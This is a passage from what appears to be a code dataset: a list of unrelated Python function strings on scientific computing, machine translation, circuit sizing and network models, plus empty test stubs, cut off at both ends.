phiTemp.max(0)", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. 
construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. 
We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print 
(phi)\n\n return phi", "def test_put_nveto_pmt_item(self):\n pass", "def solveForModeB1(X, M, n, maxInner, epsilon, tol,sita,Y1, lambta2):\n # Pi(n) = [A(N) kr A(N-1) kr ... A(n+1) kr A(n-1) kr .. A(1)]^T\n Pi = tensorTools.calculatePi(X, M, n)\n #print 'Pi size', Pi.shape\n #print 'pi='+str(Pi)\n #print(M.U[n])\n for iter in range(maxInner):\n # Phi = (X(n) elem-div (B Pi)) Pi^T\n #print X.vals.shape,X.shape\n #print X.vals.flatten().shape\n Phi = tensorTools.calculatePhi(X, M.U[n], Pi, n, epsilon=epsilon)\n #print('phi'+str(Phi))\n #print(Phi)\n # check for convergence that min(B(n), E - Phi(n)) = 0 [or close]\n kktModeViolation = np.max(np.abs(np.minimum(M.U[n], 1-Phi).flatten()))\n if (kktModeViolation < tol):\n break\n\n B=M.U[n]\n #print B.shape\n colNorm = np.apply_along_axis(np.linalg.norm, 0, B, 1)\n zeroNorm = np.where(colNorm == 0)[0]\n colNorm[zeroNorm] = 1\n B = B / colNorm[np.newaxis, :]\n tm=np.hstack((np.ones((B.shape[0],1)),B))\n Y1=Y1.reshape((Y1.shape[0],1))\n\n derive=-1.0*lambta2/B.shape[0]*np.dot((Y1-np.dot(tm,sita)),sita.T)\n #print derive.shape\n #print np.multiply(M.U[n],derive[:,1:]).shape\n #print np.multiply(M.U[n],Phi).shape\n M.U[n] = np.array(np.multiply(M.U[n],Phi))-np.array((np.multiply(M.U[n],derive[:,1:])))\n\n #print 'after'\n #print M.U[n][0]\n #print(\" Mode={0}, Inner Iter={1}, KKT violation={2}\".format(n, iter, kktModeViolation))\n return M, Phi, iter, kktModeViolation", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def exercise_b2_106():\r\n pass", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def exercise_b2_70():\r\n pass", "def comp_vext_tem_pyth(self, ao_log=None, numba_parallel=True):\n\n def c2r_lm(conv, clm, clmm, m):\n \"\"\"\n clm: sph harmonic l and m\n clmm: sph harmonic l and -m\n convert from real to complex spherical harmonic\n for an unique value of l and m\n \"\"\"\n rlm = 0.0\n if m == 0:\n rlm = conv._c2r[conv._j, conv._j]*clm\n else:\n rlm = conv._c2r[m+conv._j, m+conv._j]*clm +\\\n conv._c2r[m+conv._j, -m+conv._j]*clmm\n\n if rlm.imag > 1e-10:\n print(rlm)\n raise 
ValueError(\"Non nul imaginary paert for c2r conversion\")\n return rlm.real\n\n def get_index_lm(l, m):\n \"\"\"\n return the index of an array ordered as \n [l=0 m=0, l=1 m=-1, l=1 m=0, l=1 m=1, ....]\n \"\"\"\n return (l+1)**2 -1 -l + m\n\n warnings.warn(\"Obselete routine use comp_vext_tem\")\n\n if use_numba:\n get_time_potential = nb.jit(nopython=True, parallel=numba_parallel)(get_tem_potential_numba)\n V_time = np.zeros((self.time.size), dtype=np.complex64)\n\n aome = ao_matelem_c(self.ao_log.rr, self.ao_log.pp)\n me = ao_matelem_c(self.ao_log) if ao_log is None else aome.init_one_set(ao_log)\n atom2s = np.zeros((self.natm+1), dtype=np.int64)\n for atom,sp in enumerate(self.atom2sp): \n atom2s[atom+1]= atom2s[atom] + me.ao1.sp2norbs[sp]\n\n R0 = self.vnorm*self.time[0]*self.vdir + self.beam_offset\n rr = self.ao_log.rr\n dr = (np.log(rr[-1])-np.log(rr[0]))/(rr.size-1)\n dt = self.time[1]-self.time[0]\n dw = self.freq_symm[1] - self.freq_symm[0]\n wmin = self.freq_symm[0]\n tmin = self.time[0]\n nff = self.freq.size\n ub = self.freq_symm.size//2 - 1\n l2m = [] # list storing m value to corresponding l\n fact_fft = np.exp(-1.0j*self.freq_symm[ub:ub+nff]*tmin)\n pre_fact = dt*np.exp(-1.0j*wmin*(self.time-tmin))\n\n for l in range(me.jmx+1):\n lm = []\n for m in range(-l, l+1):\n lm.append(m)\n l2m.append(np.array(lm))\n\n for atm, sp in enumerate(self.atom2sp):\n rcut = self.ao_log.sp2rcut[sp]\n center = self.atom2coord[atm, :]\n rmax = find_nearrest_index(rr, rcut)\n\n si = atom2s[atm]\n fi = atom2s[atm+1]\n\n for mu, l in enumerate(self.pb.prod_log.sp_mu2j[sp]):\n s = self.pb.prod_log.sp_mu2s[sp][mu]\n f = self.pb.prod_log.sp_mu2s[sp][mu+1]\n\n fr_val = self.pb.prod_log.psi_log[sp][mu, :]\n inte1 = np.sum(fr_val[0:rmax+1]*rr[0:rmax+1]**(l+2)*rr[0:rmax+1]*dr)\n\n for k in range(s, f):\n V_time.fill(0.0)\n\n m = l2m[l][k-s]\n ind_lm = get_index_lm(l, m)\n ind_lmm = get_index_lm(l, -m)\n\n if use_numba:\n get_time_potential(self.time, R0, self.vnorm, self.vdir, center, rcut, inte1,\n rr, dr, fr_val, me._c2r, l, m, me._j, ind_lm, ind_lmm, V_time)\n else:\n for it, t in enumerate(self.time):\n R_sub = R0 + self.vnorm*self.vdir*(t - self.time[0]) - center\n norm = np.sqrt(np.dot(R_sub, R_sub))\n\n if norm > rcut:\n I1 = inte1/(norm**(l+1))\n I2 = 0.0\n else:\n rsub_max = find_nearrest_index(rr, norm)\n\n I1 = np.sum(fr_val[0:rsub_max+1]*\n rr[0:rsub_max+1]**(l+2)*rr[0:rsub_max+1])\n I2 = np.sum(fr_val[rsub_max+1:]*\n rr[rsub_max+1:]/(rr[rsub_max+1:]**(l-1)))\n\n I1 = I1*dr/(norm**(l+1))\n I2 = I2*(norm**l)*dr\n clm_tem = csphar(R_sub, l)\n clm = (4*np.pi/(2*l+1))*clm_tem[ind_lm]*(I1 + I2)\n clmm = (4*np.pi/(2*l+1))*clm_tem[ind_lmm]*(I1 + I2)\n rlm = c2r_lm(me, clm, clmm, m)\n V_time[it] = rlm + 0.0j\n \n V_time *= pre_fact\n \n\n FT = fft(V_time)\n\n self.V_freq[:, si + k] = FT[ub:ub+nff]*fact_fft", "def eval(self, sample):\n '''\n jv = sample.get(JOINT_VELOCITIES)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n\n boxpos = jv[:, 2:5]\n fingerpos = eepv[:, 7:10]\n tgtpos = np.zeros((100,3))\n for i in range(100):\n tgtpos[i] = [0.6, 0.2, 0.1]\n \n fetchdist = np.sum((boxpos - fingerpos) ** 2, axis=1)\n liftdist = np.sum((boxpos - tgtpos) ** 2, axis=1)\n \n l = fetchdist + liftdist\n '''\n\n eept = sample.get(END_EFFECTOR_POINTS)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n sample_u = sample.get_U()\n cfrc_ext = np.concatenate((eept[:, 13:56], eepv[:, 0:41]), axis = 1)\n # vec = eepv[:, 64:66] \n # dist = np.sum(np.square(vec), axis=1) / 5\n forward_reward = eepv[:, 53]\n 
scaling = 150\n ctrl_cost = 0.5 * 1e-2 * np.sum(np.square(sample_u / scaling), axis = 1)\n # contact_cost = 0.5 * 1e-3 * np.sum(np.square(cfrc_ext), axis = 1)\n # survive_reward = 0.5\n \n l = -forward_reward + ctrl_cost\n\n prefix=''\n logger.record_tabular('PolReturn', -sum(l))\n\n ave_vel = np.mean(forward_reward)\n min_vel = np.min(forward_reward)\n max_vel = np.max(forward_reward)\n std_vel = np.std(forward_reward)\n logger.record_tabular(prefix+'PolAverageVelocity', ave_vel)\n logger.record_tabular(prefix+'PolMinVelocity', min_vel)\n logger.record_tabular(prefix+'PolMaxVelocity', max_vel)\n logger.record_tabular(prefix+'PolStdVelocity', std_vel)\n logger.dump_tabular(with_prefix=False)\n \n lx, lu, lxx, luu, lux = 0, 0, 0, 0, 0\n\n '''\n # Compute weighted sum of each cost value and derivatives.\n weight = self._weights[0]\n l = l * weight\n lx = lx * weight\n lu = lu * weight\n lxx = lxx * weight\n luu = luu * weight\n lux = lux * weight\n for i in range(1, len(self._costs)):\n pl, plx, plu, plxx, pluu, plux = self._costs[i].eval(sample)\n weight = self._weights[i]\n l = l + pl * weight\n lx = lx + plx * weight\n lu = lu + plu * weight\n lxx = lxx + plxx * weight\n luu = luu + pluu * weight\n lux = lux + plux * weight\n '''\n \n return l, lx, lu, lxx, luu, lux", "def eulerphi(n):\n\treturn euler_phi(n)", "def test_get_nveto_pmt_item(self):\n pass", "async def _design_lvl_shift_internal_inv(self, pseg: int, nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], is_ctrl: bool,\n has_rst: bool, dual_output: bool,\n vin: str, vout: str) -> Tuple[int, int]:\n if is_ctrl: # size with fanout\n inv_nseg = int(np.round(nseg / fanout))\n inv_nseg = 1 if inv_nseg == 0 else inv_nseg\n inv_pseg = int(np.round(pseg / fanout))\n inv_pseg = 1 if inv_pseg == 0 else inv_pseg\n self.log(f\"Calculated inv to need nseg : {inv_nseg}\")\n self.log(f\"Calculated inv to need pseg : {inv_pseg}\")\n return inv_pseg, inv_nseg\n\n # First size the NMOS in the inverter assuming a reasonably sized PMOS\n inv_nseg = await self._design_lvl_shift_inv_pdn(pseg, nseg, out_inv_m, fanout, pinfo,\n tbm_specs, has_rst, dual_output, vin, vout)\n self.log(f\"Calculated inv to need at least nseg: {inv_nseg}\")\n\n # Now using the inverter pull down size, we size the inverter pull up PMOS\n inv_pseg, inv_nseg = await self._design_lvl_shift_inv_pun(pseg, nseg, inv_nseg, out_inv_m,\n fanout, pinfo,\n tbm_specs, has_rst, dual_output,\n vin, vout)\n self.log(f\"Calculated inv to need pseg: {inv_pseg} and nseg: {inv_nseg}\")\n return inv_pseg, inv_nseg", "def test_active_inference_SPM_1b(self):", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. 
For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def p(e, t):\n return b * e ** 2", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def exercise_b2_93():\r\n 
pass", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "async def 
_design_lvl_shift_inv_pun(self, pseg: int, nseg: int, inv_nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], has_rst, dual_output,\n vin, vout) -> Tuple[int, int]:\n inv_beta = get_tech_global_info('bag3_digital')['inv_beta']\n tb_params = self._get_full_tb_params()\n # Use a binary iterator to find the PMOS size\n load_seg = nseg + (pseg if has_rst else 0)\n inv_pseg_nom = int(np.round(inv_beta * load_seg / ((1 + inv_beta) * fanout)))\n inv_pseg_nom = 1 if inv_pseg_nom == 0 else inv_pseg_nom\n iterator = BinaryIterator(-inv_pseg_nom + 1, 0)\n err_best = float('inf')\n inv_in_nseg, inv_in_pseg = self._size_input_inv_for_fanout(inv_pseg_nom, inv_nseg, pseg,\n nseg, fanout, has_rst)\n all_corners = get_tech_global_info('bag3_digital')['signoff_envs']['all_corners']\n\n while iterator.has_next():\n pseg_off = iterator.get_next()\n inv_pseg = inv_pseg_nom + pseg_off\n dut_params = self._get_lvl_shift_params_dict(pinfo, pseg, nseg, inv_pseg, inv_nseg,\n inv_in_nseg, inv_in_pseg, out_inv_m,\n has_rst, dual_output)\n dut = await self.async_new_dut('lvshift', STDCellWrapper, dut_params)\n\n err_worst = -1 * float('Inf')\n for env in all_corners['envs']:\n tbm_specs['sim_envs'] = [env]\n tbm_specs['sim_params']['vdd_in'] = all_corners[vin][env]\n tbm_specs['sim_params']['vdd'] = all_corners[vout][env]\n tbm = 